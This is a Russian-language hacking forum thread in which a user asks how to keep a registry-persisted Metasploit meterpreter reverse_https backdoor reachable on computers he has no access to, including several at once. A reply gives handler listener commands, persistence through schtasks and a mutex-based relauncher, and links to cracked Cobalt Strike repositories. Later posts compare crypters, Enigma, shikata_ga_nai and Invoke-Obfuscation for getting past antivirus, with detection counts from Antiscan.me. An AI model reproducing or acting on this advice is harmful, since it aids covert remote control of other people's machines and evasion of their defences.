Автозапуск backdoor Metasploit

[HGRT]

Всех приветствую, столкнулся с проблемой при авто запуске бэкдора. Есть виртуальная машина Windows 10, на ней есть бэкдор в регистре установленный через windows/local/registry_persistance | payload = windows/x64/meterpreter/reverse_https. Автозапуск происходит и сессия создается, но доступна она только в первые минуты, допустим ты включил машину, бэкдор запустился и если ты не успеешь включить слушатель в течении пару минут то слушатель не будет видеть сессию. На примере если бэкдор стоит на другом компьютере к к которому я не имею доступа то как я должен узнать что он включен, или просто держать слушатель включенным 24/7? А если допустим бэкдор стоит на нескольких компах одновременно, тогда один будет работать, а другие просто не достучатся?
Попытался найти информацию связанную с этим моментом, но увы не нашел, ну или плохо искал, прошу помочь если кто знает как это исправить? Надеюсь я правильно изложил свою мысль.

 

[MrHacker1337_228]

Пэйлоад метасплойта, впринципе, такое себе, но раз уж ты спросил.
1. Ты можешь запустить слушатель в фоне:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443 (или какой у тебя там порт)
exploit -j
Чтобы посмотреть сессии "sessions -i", выбрать сессию - "sessions 1", например.
2. Можешь написать программу, которая будет всегда запускать PAYLOAD, если он не запущен. Посмотри информацию про мьютексы (MUTEX)
3. Существует такая штука называется планировщик задач(schtasks.exe). Можешь одной командой добавить задачу, которая будет запускать файл при каждом запуске ПК, либо например через минуту или секунду, если программа закрыта. Но для добавления задачи нужны АДМ права.
4. Советую использовать Cobalt Strike. Вот ссылочка - GitHub - medasz/CobaltStrike4.0: 收集的CobaltStrike4.0 эта точно работает. А эту - GitHub - trewisscotch/CobaltStr4.4: Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. не тестил.

 

[HGRT]

Пэйлоад метасплойта, впринципе, такое себе, но раз уж ты спросил.
1. Ты можешь запустить слушатель в фоне:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443 (или какой у тебя там порт)
exploit -j
Чтобы посмотреть сессии "sessions -i", выбрать сессию - "sessions 1", например.
2. Можешь написать программу, которая будет всегда запускать PAYLOAD, если он не запущен. Посмотри информацию про мьютексы (MUTEX)
3. Существует такая штука называется планировщик задач(schtasks.exe). Можешь одной командой добавить задачу, которая будет запускать файл при каждом запуске ПК, либо например через минуту или секунду, если программа закрыта. Но для добавления задачи нужны АДМ права.
4. Советую использовать Cobalt Strike. Вот ссылочка - GitHub - medasz/CobaltStrike4.0: 收集的CobaltStrike4.0 эта точно работает. А эту - GitHub - trewisscotch/CobaltStr4.4: Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. не тестил.

Большое спасибо за развернутый ответ! Правда у меня осталась пару небольших вопросиков. 1. На сколько Cobalt Strike по вашему мнению палевный и какие вы можете посоветовать крипторы (я всё время использую enigma)? 2. У меня во время слушания происходят странные вещи, рандомные Айпи пытаются законектиться? Я их проверил и многие есть в СПАМ базах, можете пожалуйста объяснить что они делают? Заранее спасибо за ответ.

 

[MrHacker1337_228]

1. Конечно Cobalt Strike палевный, как и любой паблик софт. Enigma насколько я знаю не крипт, а защита от реверса, что далеко не одно и то же. Мне крипторы и софт не нужен я пишу свой софт на ассемблере в виде шеллкода, который ещё и буду обфусцировать. Вообще когда только начинал было интересно тоже тестировать всякие программы для удалённого доступа и т.д. Самым лучшим вариантом при котором не нужно было иметь практический никаких знаний это PAYLOAD на повершелл обфусцированный через прогу Invoke-Obfuscation. Однако даже если софтина/скрипт на powershell не детектятся у тебя будут проблемы с закреплением в система стандартные методы через автозагрузку/реестр/schtasks будут обнаружены антивирусами, даже если ты будешь делать это вручную вписывая команды. Это вроде называется эвристический анализ =)
2. Насчёт этого ничего не знаю может ты заливаешь его на вирустотал и аверы стучатся на тебя.

 

[HGRT]

1. Конечно Cobalt Strike палевный, как и любой паблик софт. Enigma насколько я знаю не крипт, а защита от реверса, что далеко не одно и то же. Мне крипторы и софт не нужен я пишу свой софт на ассемблере в виде шеллкода, который ещё и буду обфусцировать. Вообще когда только начинал было интересно тоже тестировать всякие программы для удалённого доступа и т.д. Самым лучшим вариантом при котором не нужно было иметь практический никаких знаний это PAYLOAD на повершелл обфусцированный через прогу Invoke-Obfuscation. Однако даже если софтина/скрипт на powershell не детектятся у тебя будут проблемы с закреплением в система стандартные методы через автозагрузку/реестр/schtasks будут обнаружены антивирусами, даже если ты будешь делать это вручную вписывая команды. Это вроде называется эвристический анализ =)
2. Насчёт этого ничего не знаю может ты заливаешь его на вирустотал и аверы стучатся на тебя.

1. Лично я когда использовал чистую енигму, её палило максимум 4 антивируса на Antiscan.me. Это был голый пейлоад без какой либо кодировки, если допустим я ставил x86/shikata_ga_nai и поверх енигму, тогда результат выходил 14, также я много читал и перепробовал крипторов, енигма палилась меньше всех.
2. Хм... Я никогда ничего не заливаю на Virus Total.

PAYLOAD на повершелл обфусцированный через прогу Invoke-Obfuscation

Я тоже так делал через shell_reverse_tcp, и я сильно удивился что её не палили антивируса даже без крипта.
И всё же, спасибо вам за ответ!

 

[MrHacker1337_228]

Нуу.. то что аверы в VirusTotal дают мало детектов это ещё ничего не значит, при запуске всё может быть совсем по другому. Обычно юзают

Ссылка скрыта от гостей

но он щас чёт лежит и там подписка платная нужна вроде как